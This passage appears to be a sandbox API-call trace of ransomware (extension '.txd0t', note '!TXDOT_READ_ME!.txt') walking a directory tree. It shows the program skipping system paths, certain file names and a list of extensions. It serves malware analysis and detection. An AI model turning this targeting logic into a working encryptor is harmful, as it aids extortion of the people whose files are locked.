ftLastWriteTime.dwLowDateTime=0xf38014a5, ftLastWriteTime.dwHighDateTime=0x1d327bd, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x390d2a, dwReserved1=0x0, cFileName="1049", cAlternateFileName="")) returned 1 [0071.437] StrCmpW (psz1="1049", psz2=".") returned 1 [0071.437] StrCmpW (psz1="1049", psz2="..") returned 1 [0071.437] StrCpyNW (in: psz1=0xec6e60, psz2="C:\\588bce7c90097ed212", cchMax=1068 | out: psz1="C:\\588bce7c90097ed212") returned="C:\\588bce7c90097ed212" [0071.437] StrNCatW (in: psz1="C:\\588bce7c90097ed212", psz2="\\", cchMax=1068 | out: psz1="C:\\588bce7c90097ed212\\") returned="C:\\588bce7c90097ed212\\" [0071.437] StrNCatW (in: psz1="C:\\588bce7c90097ed212\\", psz2="1049", cchMax=1068 | out: psz1="C:\\588bce7c90097ed212\\1049") returned="C:\\588bce7c90097ed212\\1049" [0071.437] StrStrIW (lpFirst="C:\\588bce7c90097ed212\\1049", lpSrch="\\windows\\system32\\") returned 0x0 [0071.437] StrStrIW (lpFirst="C:\\588bce7c90097ed212\\1049", lpSrch="\\windows\\syswow64\\") returned 0x0 [0071.437] StrStrIW (lpFirst="C:\\588bce7c90097ed212\\1049", lpSrch="\\windows\\system\\") returned 0x0 [0071.437] StrStrIW (lpFirst="C:\\588bce7c90097ed212\\1049", lpSrch="\\windows\\winsxs\\") returned 0x0 [0071.437] StrStrIW (lpFirst="C:\\588bce7c90097ed212\\1049", lpSrch="\\appdata\\roaming\\") returned 0x0 [0071.437] StrStrIW (lpFirst="C:\\588bce7c90097ed212\\1049", lpSrch="\\appdata\\local\\") returned 0x0 [0071.437] StrStrIW (lpFirst="C:\\588bce7c90097ed212\\1049", lpSrch="\\appdata\\locallow\\") returned 0x0 [0071.437] StrStrIW (lpFirst="C:\\588bce7c90097ed212\\1049", lpSrch="\\all users\\microsoft\\") returned 0x0 [0071.437] StrStrIW (lpFirst="C:\\588bce7c90097ed212\\1049", lpSrch="\\inetpub\\logs\\") returned 0x0 [0071.437] StrStrIW (lpFirst="C:\\588bce7c90097ed212\\1049", lpSrch=":\\boot\\") returned 0x0 [0071.437] StrStrIW (lpFirst="C:\\588bce7c90097ed212\\1049", lpSrch=":\\perflogs\\") returned 0x0 [0071.437] StrStrIW (lpFirst="C:\\588bce7c90097ed212\\1049", lpSrch=":\\programdata\\") returned 0x0 [0071.437] StrStrIW (lpFirst="C:\\588bce7c90097ed212\\1049", lpSrch=":\\drivers\\") returned 0x0 [0071.438] StrStrIW (lpFirst="C:\\588bce7c90097ed212\\1049", lpSrch=":\\wsus\\") returned 0x0 [0071.438] StrStrIW (lpFirst="C:\\588bce7c90097ed212\\1049", lpSrch=":\\efstmpwp\\") returned 0x0 [0071.438] StrStrIW (lpFirst="C:\\588bce7c90097ed212\\1049", lpSrch=":\\$recycle.bin\\") returned 0x0 [0071.438] StrStrIW (lpFirst="C:\\588bce7c90097ed212\\1049", lpSrch="crypt_detect") returned 0x0 [0071.438] StrStrIW (lpFirst="C:\\588bce7c90097ed212\\1049", lpSrch="cryptolocker") returned 0x0 [0071.438] StrStrIW (lpFirst="C:\\588bce7c90097ed212\\1049", lpSrch="ransomware") returned 0x0 [0071.438] StrStrIW (lpFirst="C:\\588bce7c90097ed212\\1049", lpSrch="C:\\WINDOWS") returned 0x0 [0071.438] StrStrIW (lpFirst="C:\\588bce7c90097ed212\\1049", lpSrch="C:\\Program Files (x86)") returned 0x0 [0071.438] StrStrIW (lpFirst="C:\\588bce7c90097ed212\\1049", lpSrch="C:\\Program Files") returned 0x0 [0071.438] GetProcessHeap () returned 0xe30000 [0071.438] RtlAllocateHeap (HeapHandle=0xe30000, Flags=0x8, Size=0x4b6) returned 0xec8320 [0071.438] StrCpyNW (in: psz1=0xec8320, psz2="C:\\588bce7c90097ed212\\1049", cchMax=1078 | out: psz1="C:\\588bce7c90097ed212\\1049") returned="C:\\588bce7c90097ed212\\1049" [0071.438] StrNCatW (in: psz1="C:\\588bce7c90097ed212\\1049", psz2="\\*", cchMax=1078 | out: psz1="C:\\588bce7c90097ed212\\1049\\*") returned="C:\\588bce7c90097ed212\\1049\\*" [0071.438] FindFirstFileW (in: lpFileName="C:\\588bce7c90097ed212\\1049\\*", lpFindFileData=0x552f6f8 | out: lpFindFileData=0x552f6f8*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xf3768b28, ftCreationTime.dwHighDateTime=0x1d327bd, ftLastAccessTime.dwLowDateTime=0xf37b4fe2, ftLastAccessTime.dwHighDateTime=0x1d327bd, ftLastWriteTime.dwLowDateTime=0xf38014a5, ftLastWriteTime.dwHighDateTime=0x1d327bd, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x390d2a, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0xec2730 [0071.438] StrCmpW (psz1=".", psz2=".") returned 0 [0071.438] FindNextFileW (in: hFindFile=0xec2730, lpFindFileData=0x552f6f8 | out: lpFindFileData=0x552f6f8*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xf3768b28, ftCreationTime.dwHighDateTime=0x1d327bd, ftLastAccessTime.dwLowDateTime=0xf37b4fe2, ftLastAccessTime.dwHighDateTime=0x1d327bd, ftLastWriteTime.dwLowDateTime=0xf38014a5, ftLastWriteTime.dwHighDateTime=0x1d327bd, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x390d2a, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0071.438] StrCmpW (psz1="..", psz2=".") returned 1 [0071.438] StrCmpW (psz1="..", psz2="..") returned 0 [0071.438] FindNextFileW (in: hFindFile=0xec2730, lpFindFileData=0x552f6f8 | out: lpFindFileData=0x552f6f8*(dwFileAttributes=0x80, ftCreationTime.dwLowDateTime=0x69d9e300, ftCreationTime.dwHighDateTime=0x1cac0d3, ftLastAccessTime.dwLowDateTime=0x69d9e300, ftLastAccessTime.dwHighDateTime=0x1cac0d3, ftLastWriteTime.dwLowDateTime=0x69d9e300, ftLastWriteTime.dwHighDateTime=0x1cac0d3, nFileSizeHigh=0x0, nFileSizeLow=0xd4b8, dwReserved0=0x390d2a, dwReserved1=0x0, cFileName="eula.rtf", cAlternateFileName="")) returned 1 [0071.438] StrCmpW (psz1="eula.rtf", psz2=".") returned 1 [0071.438] StrCmpW (psz1="eula.rtf", psz2="..") returned 1 [0071.438] StrCpyNW (in: psz1=0xec8320, psz2="C:\\588bce7c90097ed212\\1049", cchMax=1078 | out: psz1="C:\\588bce7c90097ed212\\1049") returned="C:\\588bce7c90097ed212\\1049" [0071.438] StrNCatW (in: psz1="C:\\588bce7c90097ed212\\1049", psz2="\\", cchMax=1078 | out: psz1="C:\\588bce7c90097ed212\\1049\\") returned="C:\\588bce7c90097ed212\\1049\\" [0071.439] StrNCatW (in: psz1="C:\\588bce7c90097ed212\\1049\\", psz2="eula.rtf", cchMax=1078 | out: psz1="C:\\588bce7c90097ed212\\1049\\eula.rtf") returned="C:\\588bce7c90097ed212\\1049\\eula.rtf" [0071.439] PathFindExtensionW (pszPath="eula.rtf") returned=".rtf" [0071.439] StrCmpW (psz1=".rtf", psz2=".txd0t") returned -1 [0071.439] StrCmpIW (psz1="eula.rtf", psz2="bootsect.bak") returned 1 [0071.439] StrCmpIW (psz1="eula.rtf", psz2="iconcache.db") returned -1 [0071.439] StrCmpIW (psz1="eula.rtf", psz2="thumbs.db") returned -1 [0071.439] StrCmpIW (psz1="eula.rtf", psz2=" ransomware ") returned 1 [0071.439] StrCmpIW (psz1="eula.rtf", psz2=" ransom ") returned 1 [0071.439] StrCmpIW (psz1="eula.rtf", psz2="debug.txt") returned 1 [0071.439] StrCmpIW (psz1="eula.rtf", psz2="boot.ini") returned 1 [0071.439] StrCmpIW (psz1="eula.rtf", psz2="desktop.ini") returned 1 [0071.439] StrCmpIW (psz1="eula.rtf", psz2="autorun.inf") returned 1 [0071.439] StrCmpIW (psz1="eula.rtf", psz2="ntuser.dat") returned -1 [0071.439] StrCmpIW (psz1="eula.rtf", psz2="ntldr") returned -1 [0071.439] StrCmpIW (psz1="eula.rtf", psz2="ntdetect.com") returned -1 [0071.439] StrCmpIW (psz1="eula.rtf", psz2="bootfont.bin") returned 1 [0071.439] StrCmpIW (psz1="eula.rtf", psz2="!TXDOT_READ_ME!.txt") returned 1 [0071.439] PathFindExtensionW (pszPath="eula.rtf") returned=".rtf" [0071.439] StrStrIW (lpFirst=".ani|.cab|.cpl|.cur|.diagcab|.diagpkg|.dll|.drv|.hlp|.icl|.icns|.ico|.iso|.ics|.lnk|.idx|.mod|.mpa|.msc|.msp|.msstyles|.msu|.nomedia|.ocx|.prf|.rtp|.scr|.shs|.spl|.sys|.theme|.themepack|.exe|.bat|.cmd|.url|.mui", lpSrch=".rtf") returned 0x0 [0071.439] FileTimeToSystemTime (in: lpFileTime=0x552f6fc, lpSystemTime=0x552f6e8 | out: lpSystemTime=0x552f6e8) returned 1 [0071.439] SystemTimeToTzSpecificLocalTime (in: lpTimeZoneInformation=0x0, lpUniversalTime=0x552f6e8, lpLocalTime=0x552f6b8 | out: lpLocalTime=0x552f6b8) returned 1 [0071.439] FileTimeToSystemTime (in: lpFileTime=0x552f704, lpSystemTime=0x552f6c8 | out: lpSystemTime=0x552f6c8) returned 1 [0071.439] SystemTimeToTzSpecificLocalTime (in: lpTimeZoneInformation=0x0, lpUniversalTime=0x552f6c8, lpLocalTime=0x552f6d8 | out: lpLocalTime=0x552f6d8) returned 1 [0071.439] FileTimeToSystemTime (in: lpFileTime=0x552f70c, lpSystemTime=0x552f690 | out: lpSystemTime=0x552f690) returned 1 [0071.439] SystemTimeToTzSpecificLocalTime (in: lpTimeZoneInformation=0x0, lpUniversalTime=0x552f690, lpLocalTime=0x552f680 | out: lpLocalTime=0x552f680) returned 1 [0071.439] FindNextFileW (in: hFindFile=0xec2730, lpFindFileData=0x552f6f8 | out: lpFindFileData=0x552f6f8*(dwFileAttributes=0x80, ftCreationTime.dwLowDateTime=0x5398dc00, ftCreationTime.dwHighDateTime=0x1cac6fe, ftLastAccessTime.dwLowDateTime=0x5398dc00, ftLastAccessTime.dwHighDateTime=0x1cac6fe, ftLastWriteTime.dwLowDateTime=0x5398dc00, ftLastWriteTime.dwHighDateTime=0x1cac6fe, nFileSizeHigh=0x0, nFileSizeLow=0x13e4a, dwReserved0=0x390d2a, dwReserved1=0x0, cFileName="LocalizedData.xml", cAlternateFileName="LOCALI~1.XML")) returned 1 [0071.439] StrCmpW (psz1="LocalizedData.xml", psz2=".") returned 1 [0071.439] StrCmpW (psz1="LocalizedData.xml", psz2="..") returned 1 [0071.439] StrCpyNW (in: psz1=0xec8320, psz2="C:\\588bce7c90097ed212\\1049", cchMax=1078 | out: psz1="C:\\588bce7c90097ed212\\1049") returned="C:\\588bce7c90097ed212\\1049" [0071.439] StrNCatW (in: psz1="C:\\588bce7c90097ed212\\1049", psz2="\\", cchMax=1078 | out: psz1="C:\\588bce7c90097ed212\\1049\\") returned="C:\\588bce7c90097ed212\\1049\\" [0071.439] StrNCatW (in: psz1="C:\\588bce7c90097ed212\\1049\\", psz2="LocalizedData.xml", cchMax=1078 | out: psz1="C:\\588bce7c90097ed212\\1049\\LocalizedData.xml") returned="C:\\588bce7c90097ed212\\1049\\LocalizedData.xml" [0071.439] PathFindExtensionW (pszPath="LocalizedData.xml") returned=".xml" [0071.440] StrCmpW (psz1=".xml", psz2=".txd0t") returned 1 [0071.440] StrCmpIW (psz1="LocalizedData.xml", psz2="bootsect.bak") returned 1 [0071.440] StrCmpIW (psz1="LocalizedData.xml", psz2="iconcache.db") returned 1 [0071.440] StrCmpIW (psz1="LocalizedData.xml", psz2="thumbs.db") returned -1 [0071.440] StrCmpIW (psz1="LocalizedData.xml", psz2=" ransomware ") returned 1 [0071.440] StrCmpIW (psz1="LocalizedData.xml", psz2=" ransom ") returned 1 [0071.440] StrCmpIW (psz1="LocalizedData.xml", psz2="debug.txt") returned 1 [0071.440] StrCmpIW (psz1="LocalizedData.xml", psz2="boot.ini") returned 1 [0071.440] StrCmpIW (psz1="LocalizedData.xml", psz2="desktop.ini") returned 1 [0071.440] StrCmpIW (psz1="LocalizedData.xml", psz2="autorun.inf") returned 1 [0071.440] StrCmpIW (psz1="LocalizedData.xml", psz2="ntuser.dat") returned -1 [0071.440] StrCmpIW (psz1="LocalizedData.xml", psz2="ntldr") returned -1 [0071.440] StrCmpIW (psz1="LocalizedData.xml", psz2="ntdetect.com") returned -1 [0071.440] StrCmpIW (psz1="LocalizedData.xml", psz2="bootfont.bin") returned 1 [0071.440] StrCmpIW (psz1="LocalizedData.xml", psz2="!TXDOT_READ_ME!.txt") returned 1 [0071.440] PathFindExtensionW (pszPath="LocalizedData.xml") returned=".xml" [0071.440] StrStrIW (lpFirst=".ani|.cab|.cpl|.cur|.diagcab|.diagpkg|.dll|.drv|.hlp|.icl|.icns|.ico|.iso|.ics|.lnk|.idx|.mod|.mpa|.msc|.msp|.msstyles|.msu|.nomedia|.ocx|.prf|.rtp|.scr|.shs|.spl|.sys|.theme|.themepack|.exe|.bat|.cmd|.url|.mui", lpSrch=".xml") returned 0x0 [0071.440] FileTimeToSystemTime (in: lpFileTime=0x552f6fc, lpSystemTime=0x552f6e8 | out: lpSystemTime=0x552f6e8) returned 1 [0071.440] SystemTimeToTzSpecificLocalTime (in: lpTimeZoneInformation=0x0, lpUniversalTime=0x552f6e8, lpLocalTime=0x552f6b8 | out: lpLocalTime=0x552f6b8) returned 1 [0071.440] FileTimeToSystemTime (in: lpFileTime=0x552f704, lpSystemTime=0x552f6c8 | out: lpSystemTime=0x552f6c8) returned 1 [0071.440] SystemTimeToTzSpecificLocalTime (in: lpTimeZoneInformation=0x0, lpUniversalTime=0x552f6c8, lpLocalTime=0x552f6d8 | out: lpLocalTime=0x552f6d8) returned 1 [0071.440] FileTimeToSystemTime (in: lpFileTime=0x552f70c, lpSystemTime=0x552f690 | out: lpSystemTime=0x552f690) returned 1 [0071.440] SystemTimeToTzSpecificLocalTime (in: lpTimeZoneInformation=0x0, lpUniversalTime=0x552f690, lpLocalTime=0x552f680 | out: lpLocalTime=0x552f680) returned 1 [0071.440] FindNextFileW (in: hFindFile=0xec2730, lpFindFileData=0x552f6f8 | out: lpFindFileData=0x552f6f8*(dwFileAttributes=0x80, ftCreationTime.dwLowDateTime=0xe40ff600, ftCreationTime.dwHighDateTime=0x1cac6d7, ftLastAccessTime.dwLowDateTime=0xe40ff600, ftLastAccessTime.dwHighDateTime=0x1cac6d7, ftLastWriteTime.dwLowDateTime=0xe40ff600, ftLastWriteTime.dwHighDateTime=0x1cac6d7, nFileSizeHigh=0x0, nFileSizeLow=0x4758, dwReserved0=0x390d2a, dwReserved1=0x0, cFileName="SetupResources.dll", cAlternateFileName="SETUPR~1.DLL")) returned 1 [0071.440] StrCmpW (psz1="SetupResources.dll", psz2=".") returned 1 [0071.440] StrCmpW (psz1="SetupResources.dll", psz2="..") returned 1 [0071.440] StrCpyNW (in: psz1=0xec8320, psz2="C:\\588bce7c90097ed212\\1049", cchMax=1078 | out: psz1="C:\\588bce7c90097ed212\\1049") returned="C:\\588bce7c90097ed212\\1049" [0071.440] StrNCatW (in: psz1="C:\\588bce7c90097ed212\\1049", psz2="\\", cchMax=1078 | out: psz1="C:\\588bce7c90097ed212\\1049\\") returned="C:\\588bce7c90097ed212\\1049\\" [0071.440] StrNCatW (in: psz1="C:\\588bce7c90097ed212\\1049\\", psz2="SetupResources.dll", cchMax=1078 | out: psz1="C:\\588bce7c90097ed212\\1049\\SetupResources.dll") returned="C:\\588bce7c90097ed212\\1049\\SetupResources.dll" [0071.440] PathFindExtensionW (pszPath="SetupResources.dll") returned=".dll" [0071.440] StrCmpW (psz1=".dll", psz2=".txd0t") returned -1 [0071.441] StrCmpIW (psz1="SetupResources.dll", psz2="bootsect.bak") returned 1 [0071.441] StrCmpIW (psz1="SetupResources.dll", psz2="iconcache.db") returned 1 [0071.441] StrCmpIW (psz1="SetupResources.dll", psz2="thumbs.db") returned -1 [0071.441] StrCmpIW (psz1="SetupResources.dll", psz2=" ransomware ") returned 1 [0071.441] StrCmpIW (psz1="SetupResources.dll", psz2=" ransom ") returned 1 [0071.441] StrCmpIW (psz1="SetupResources.dll", psz2="debug.txt") returned 1 [0071.441] StrCmpIW (psz1="SetupResources.dll", psz2="boot.ini") returned 1 [0071.441] StrCmpIW (psz1="SetupResources.dll", psz2="desktop.ini") returned 1 [0071.441] StrCmpIW (psz1="SetupResources.dll", psz2="autorun.inf") returned 1 [0071.441] StrCmpIW (psz1="SetupResources.dll", psz2="ntuser.dat") returned 1 [0071.441] StrCmpIW (psz1="SetupResources.dll", psz2="ntldr") returned 1 [0071.441] StrCmpIW (psz1="SetupResources.dll", psz2="ntdetect.com") returned 1 [0071.441] StrCmpIW (psz1="SetupResources.dll", psz2="bootfont.bin") returned 1 [0071.441] StrCmpIW (psz1="SetupResources.dll", psz2="!TXDOT_READ_ME!.txt") returned 1 [0071.441] PathFindExtensionW (pszPath="SetupResources.dll") returned=".dll" [0071.441] StrStrIW (lpFirst=".ani|.cab|.cpl|.cur|.diagcab|.diagpkg|.dll|.drv|.hlp|.icl|.icns|.ico|.iso|.ics|.lnk|.idx|.mod|.mpa|.msc|.msp|.msstyles|.msu|.nomedia|.ocx|.prf|.rtp|.scr|.shs|.spl|.sys|.theme|.themepack|.exe|.bat|.cmd|.url|.mui", lpSrch=".dll") returned=".dll|.drv|.hlp|.icl|.icns|.ico|.iso|.ics|.lnk|.idx|.mod|.mpa|.msc|.msp|.msstyles|.msu|.nomedia|.ocx|.prf|.rtp|.scr|.shs|.spl|.sys|.theme|.themepack|.exe|.bat|.cmd|.url|.mui" [0071.441] FindNextFileW (in: hFindFile=0xec2730, lpFindFileData=0x552f6f8 | out: lpFindFileData=0x552f6f8*(dwFileAttributes=0x80, ftCreationTime.dwLowDateTime=0xe40ff600, ftCreationTime.dwHighDateTime=0x1cac6d7, ftLastAccessTime.dwLowDateTime=0xe40ff600, ftLastAccessTime.dwHighDateTime=0x1cac6d7, ftLastWriteTime.dwLowDateTime=0xe40ff600, ftLastWriteTime.dwHighDateTime=0x1cac6d7, nFileSizeHigh=0x0, nFileSizeLow=0x4758, dwReserved0=0x390d2a, dwReserved1=0x0, cFileName="SetupResources.dll", cAlternateFileName="SETUPR~1.DLL")) returned 0 [0071.441] FindClose (in: hFindFile=0xec2730 | out: hFindFile=0xec2730) returned 1 [0071.441] GetProcessHeap () returned 0xe30000 [0071.441] HeapFree (in: hHeap=0xe30000, dwFlags=0x0, lpMem=0xec8320 | out: hHeap=0xe30000) returned 1 [0071.441] FindNextFileW (in: hFindFile=0xec23f0, lpFindFileData=0x552f9a8 | out: lpFindFileData=0x552f9a8*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xf3768b28, ftCreationTime.dwHighDateTime=0x1d327bd, ftLastAccessTime.dwLowDateTime=0xf37b4fe2, ftLastAccessTime.dwHighDateTime=0x1d327bd, ftLastWriteTime.dwLowDateTime=0xf38014a5, ftLastWriteTime.dwHighDateTime=0x1d327bd, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x390d2a, dwReserved1=0x0, cFileName="1053", cAlternateFileName="")) returned 1 [0071.441] StrCmpW (psz1="1053", psz2=".") returned 1 [0071.441] StrCmpW (psz1="1053", psz2="..") returned 1 [0071.441] StrCpyNW (in: psz1=0xec6e60, psz2="C:\\588bce7c90097ed212", cchMax=1068 | out: psz1="C:\\588bce7c90097ed212") returned="C:\\588bce7c90097ed212" [0071.441] StrNCatW (in: psz1="C:\\588bce7c90097ed212", psz2="\\", cchMax=1068 | out: psz1="C:\\588bce7c90097ed212\\") returned="C:\\588bce7c90097ed212\\" [0071.441] StrNCatW (in: psz1="C:\\588bce7c90097ed212\\", psz2="1053", cchMax=1068 | out: psz1="C:\\588bce7c90097ed212\\1053") returned="C:\\588bce7c90097ed212\\1053" [0071.441] StrStrIW (lpFirst="C:\\588bce7c90097ed212\\1053", lpSrch="\\windows\\system32\\") returned 0x0 [0071.441] StrStrIW (lpFirst="C:\\588bce7c90097ed212\\1053", lpSrch="\\windows\\syswow64\\") returned 0x0 [0071.552] StrStrIW (lpFirst="C:\\588bce7c90097ed212\\1053", lpSrch="\\windows\\system\\") returned 0x0 [0071.552] StrStrIW (lpFirst="C:\\588bce7c90097ed212\\1053", lpSrch="\\windows\\winsxs\\") returned 0x0 [0071.552] StrStrIW (lpFirst="C:\\588bce7c90097ed212\\1053", lpSrch="\\appdata\\roaming\\") returned 0x0 [0071.552] StrStrIW (lpFirst="C:\\588bce7c90097ed212\\1053", lpSrch="\\appdata\\local\\") returned 0x0 [0071.552] StrStrIW (lpFirst="C:\\588bce7c90097ed212\\1053", lpSrch="\\appdata\\locallow\\") returned 0x0 [0071.552] StrStrIW (lpFirst="C:\\588bce7c90097ed212\\1053", lpSrch="\\all users\\microsoft\\") returned 0x0 [0071.552] StrStrIW (lpFirst="C:\\588bce7c90097ed212\\1053", lpSrch="\\inetpub\\logs\\") returned 0x0 [0071.552] StrStrIW (lpFirst="C:\\588bce7c90097ed212\\1053", lpSrch=":\\boot\\") returned 0x0 [0071.552] StrStrIW (lpFirst="C:\\588bce7c90097ed212\\1053", lpSrch=":\\perflogs\\") returned 0x0 [0071.552] StrStrIW (lpFirst="C:\\588bce7c90097ed212\\1053", lpSrch=":\\programdata\\") returned 0x0 [0071.552] StrStrIW (lpFirst="C:\\588bce7c90097ed212\\1053", lpSrch=":\\drivers\\") returned 0x0 [0071.552] StrStrIW (lpFirst="C:\\588bce7c90097ed212\\1053", lpSrch=":\\wsus\\") returned 0x0 [0071.553] StrStrIW (lpFirst="C:\\588bce7c90097ed212\\1053", lpSrch=":\\efstmpwp\\") returned 0x0 [0071.553] StrStrIW (lpFirst="C:\\588bce7c90097ed212\\1053", lpSrch=":\\$recycle.bin\\") returned 0x0 [0071.553] StrStrIW (lpFirst="C:\\588bce7c90097ed212\\1053", lpSrch="crypt_detect") returned 0x0 [0071.553] StrStrIW (lpFirst="C:\\588bce7c90097ed212\\1053", lpSrch="cryptolocker") returned 0x0 [0071.553] StrStrIW (lpFirst="C:\\588bce7c90097ed212\\1053", lpSrch="ransomware") returned 0x0 [0071.553] StrStrIW (lpFirst="C:\\588bce7c90097ed212\\1053", lpSrch="C:\\WINDOWS") returned 0x0 [0071.553] StrStrIW (lpFirst="C:\\588bce7c90097ed212\\1053", lpSrch="C:\\Program Files (x86)") returned 0x0 [0071.553] StrStrIW (lpFirst="C:\\588bce7c90097ed212\\1053", lpSrch="C:\\Program Files") returned 0x0 [0071.553] GetProcessHeap () returned 0xe30000 [0071.553] RtlAllocateHeap (HeapHandle=0xe30000, Flags=0x8, Size=0x4b6) returned 0xecab68 [0071.553] StrCpyNW (in: psz1=0xecab68, psz2="C:\\588bce7c90097ed212\\1053", cchMax=1078 | out: psz1="C:\\588bce7c90097ed212\\1053") returned="C:\\588bce7c90097ed212\\1053" [0071.553] StrNCatW (in: psz1="C:\\588bce7c90097ed212\\1053", psz2="\\*", cchMax=1078 | out: psz1="C:\\588bce7c90097ed212\\1053\\*") returned="C:\\588bce7c90097ed212\\1053\\*" [0071.553] FindFirstFileW (in: lpFileName="C:\\588bce7c90097ed212\\1053\\*", lpFindFileData=0x552f6f8 | out: lpFindFileData=0x552f6f8*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xf3768b28, ftCreationTime.dwHighDateTime=0x1d327bd, ftLastAccessTime.dwLowDateTime=0xf37b4fe2, ftLastAccessTime.dwHighDateTime=0x1d327bd, ftLastWriteTime.dwLowDateTime=0xf38014a5, ftLastWriteTime.dwHighDateTime=0x1d327bd, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x390d2a, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0xec22f0 [0071.554] StrCmpW (psz1=".", psz2=".") returned 0 [0071.554] FindNextFileW (in: hFindFile=0xec22f0, lpFindFileData=0x552f6f8 | out: lpFindFileData=0x552f6f8*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xf3768b28, ftCreationTime.dwHighDateTime=0x1d327bd, ftLastAccessTime.dwLowDateTime=0xf37b4fe2, ftLastAccessTime.dwHighDateTime=0x1d327bd, ftLastWriteTime.dwLowDateTime=0xf38014a5, ftLastWriteTime.dwHighDateTime=0x1d327bd, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x390d2a, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0071.554] StrCmpW (psz1="..", psz2=".") returned 1 [0071.554] StrCmpW (psz1="..", psz2="..") returned 0 [0071.554] FindNextFileW (in: hFindFile=0xec22f0, lpFindFileData=0x552f6f8 | out: lpFindFileData=0x552f6f8*(dwFileAttributes=0x80, ftCreationTime.dwLowDateTime=0x69d9e300, ftCreationTime.dwHighDateTime=0x1cac0d3, ftLastAccessTime.dwLowDateTime=0x69d9e300, ftLastAccessTime.dwHighDateTime=0x1cac0d3, ftLastWriteTime.dwLowDateTime=0x69d9e300, ftLastWriteTime.dwHighDateTime=0x1cac0d3, nFileSizeHigh=0x0, nFileSizeLow=0xf19, dwReserved0=0x390d2a, dwReserved1=0x0, cFileName="eula.rtf", cAlternateFileName="")) returned 1 [0071.554] StrCmpW (psz1="eula.rtf", psz2=".") returned 1 [0071.554] StrCmpW (psz1="eula.rtf", psz2="..") returned 1 [0071.554] StrCpyNW (in: psz1=0xecab68, psz2="C:\\588bce7c90097ed212\\1053", cchMax=1078 | out: psz1="C:\\588bce7c90097ed212\\1053") returned="C:\\588bce7c90097ed212\\1053" [0071.554] StrNCatW (in: psz1="C:\\588bce7c90097ed212\\1053", psz2="\\", cchMax=1078 | out: psz1="C:\\588bce7c90097ed212\\1053\\") returned="C:\\588bce7c90097ed212\\1053\\" [0071.554] StrNCatW (in: psz1="C:\\588bce7c90097ed212\\1053\\", psz2="eula.rtf", cchMax=1078 | out: psz1="C:\\588bce7c90097ed212\\1053\\eula.rtf") returned="C:\\588bce7c90097ed212\\1053\\eula.rtf" [0071.554] PathFindExtensionW (pszPath="eula.rtf") returned=".rtf" [0071.554] StrCmpW (psz1=".rtf", psz2=".txd0t") returned -1 [0071.554] StrCmpIW (psz1="eula.rtf", psz2="bootsect.bak") returned 1 [0071.554] StrCmpIW (psz1="eula.rtf", psz2="iconcache.db") returned -1 [0071.554] StrCmpIW (psz1="eula.rtf", psz2="thumbs.db") returned -1 [0071.554] StrCmpIW (psz1="eula.rtf", psz2=" ransomware ") returned 1 [0071.554] StrCmpIW (psz1="eula.rtf", psz2=" ransom ") returned 1 [0071.554] StrCmpIW (psz1="eula.rtf", psz2="debug.txt") returned 1 [0071.554] StrCmpIW (psz1="eula.rtf", psz2="boot.ini") returned 1 [0071.554] StrCmpIW (psz1="eula.rtf", psz2="desktop.ini") returned 1 [0071.554] StrCmpIW (psz1="eula.rtf", psz2="autorun.inf") returned 1 [0071.554] StrCmpIW (psz1="eula.rtf", psz2="ntuser.dat") returned -1 [0071.554] StrCmpIW (psz1="eula.rtf", psz2="ntldr") returned -1 [0071.554] StrCmpIW (psz1="eula.rtf", psz2="ntdetect.com") returned -1 [0071.554] StrCmpIW (psz1="eula.rtf", psz2="bootfont.bin") returned 1 [0071.554] StrCmpIW (psz1="eula.rtf", psz2="!TXDOT_READ_ME!.txt") returned 1 [0071.554] PathFindExtensionW (pszPath="eula.rtf") returned=".rtf" [0071.554] StrStrIW (lpFirst=".ani|.cab|.cpl|.cur|.diagcab|.diagpkg|.dll|.drv|.hlp|.icl|.icns|.ico|.iso|.ics|.lnk|.idx|.mod|.mpa|.msc|.msp|.msstyles|.msu|.nomedia|.ocx|.prf|.rtp|.scr|.shs|.spl|.sys|.theme|.themepack|.exe|.bat|.cmd|.url|.mui", lpSrch=".rtf") returned 0x0 [0071.555] FileTimeToSystemTime (in: lpFileTime=0x552f6fc, lpSystemTime=0x552f6e8 | out: lpSystemTime=0x552f6e8) returned 1 [0071.555] SystemTimeToTzSpecificLocalTime (in: lpTimeZoneInformation=0x0, lpUniversalTime=0x552f6e8, lpLocalTime=0x552f6b8 | out: lpLocalTime=0x552f6b8) returned 1 [0071.555] FileTimeToSystemTime (in: lpFileTime=0x552f704, lpSystemTime=0x552f6c8 | out: lpSystemTime=0x552f6c8) returned 1 [0071.555] SystemTimeToTzSpecificLocalTime (in: lpTimeZoneInformation=0x0, lpUniversalTime=0x552f6c8, lpLocalTime=0x552f6d8 | out: lpLocalTime=0x552f6d8) returned 1 [0071.555] FileTimeToSystemTime (in: lpFileTime=0x552f70c, lpSystemTime=0x552f690 | out: lpSystemTime=0x552f690) returned 1 [0071.555] SystemTimeToTzSpecificLocalTime (in: lpTimeZoneInformation=0x0, lpUniversalTime=0x552f690, lpLocalTime=0x552f680 | out: lpLocalTime=0x552f680) returned 1 [0071.555] FindNextFileW (in: hFindFile=0xec22f0, lpFindFileData=0x552f6f8 | out: lpFindFileData=0x552f6f8*(dwFileAttributes=0x80, ftCreationTime.dwLowDateTime=0x5398dc00, ftCreationTime.dwHighDateTime=0x1cac6fe, ftLastAccessTime.dwLowDateTime=0x5398dc00, ftLastAccessTime.dwHighDateTime=0x1cac6fe, ftLastWriteTime.dwLowDateTime=0x5398dc00, ftLastWriteTime.dwHighDateTime=0x1cac6fe, nFileSizeHigh=0x0, nFileSizeLow=0x12f70, dwReserved0=0x390d2a, dwReserved1=0x0, cFileName="LocalizedData.xml", cAlternateFileName="LOCALI~1.XML")) returned 1 [0071.555] StrCmpW (psz1="LocalizedData.xml", psz2=".") returned 1 